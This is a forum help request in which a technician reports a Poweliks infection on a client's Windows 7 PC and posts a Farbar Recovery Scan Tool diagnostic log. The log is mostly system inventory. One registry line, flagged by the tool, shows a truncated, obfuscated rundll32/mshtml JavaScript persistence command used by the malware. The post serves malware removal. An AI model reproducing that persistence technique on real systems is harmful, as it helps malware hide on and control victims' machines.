Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Poweliks


  • This topic is locked This topic is locked
15 replies to this topic

#1 ScotDesort

ScotDesort

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 28 October 2014 - 10:46 AM

I have a client's PC running Windows 7. It is infected with Poweliks. dllhost processes that spawn and consume resources. I have already scanned with MBAM, COMBOFIX, TDDS and SOPHOS. All are clear, except... Combofix identifies and supposedly removes Poweliks but it returns.

 

Ran FRST. Here is log. Thanks in advance for any help:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-10-2014 01
Ran by KELI (administrator) on ATTY-2 on 28-10-2014 10:01:43
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129

FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-27 16:13 - 00025282 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-28 10:02 - 00013066 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-28 10:01 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:57 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:57 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:57 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:57 - 2014-09-18 20:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:57 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:57 - 2014-09-18 20:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:57 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:57 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:57 - 2014-09-18 20:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:57 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:57 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:57 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:57 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:57 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:57 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:56 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:56 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:56 - 2014-08-18 22:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:56 - 2014-08-18 22:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:56 - 2014-08-18 21:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:56 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:56 - 2014-07-16 21:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:56 - 2014-07-16 21:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:56 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
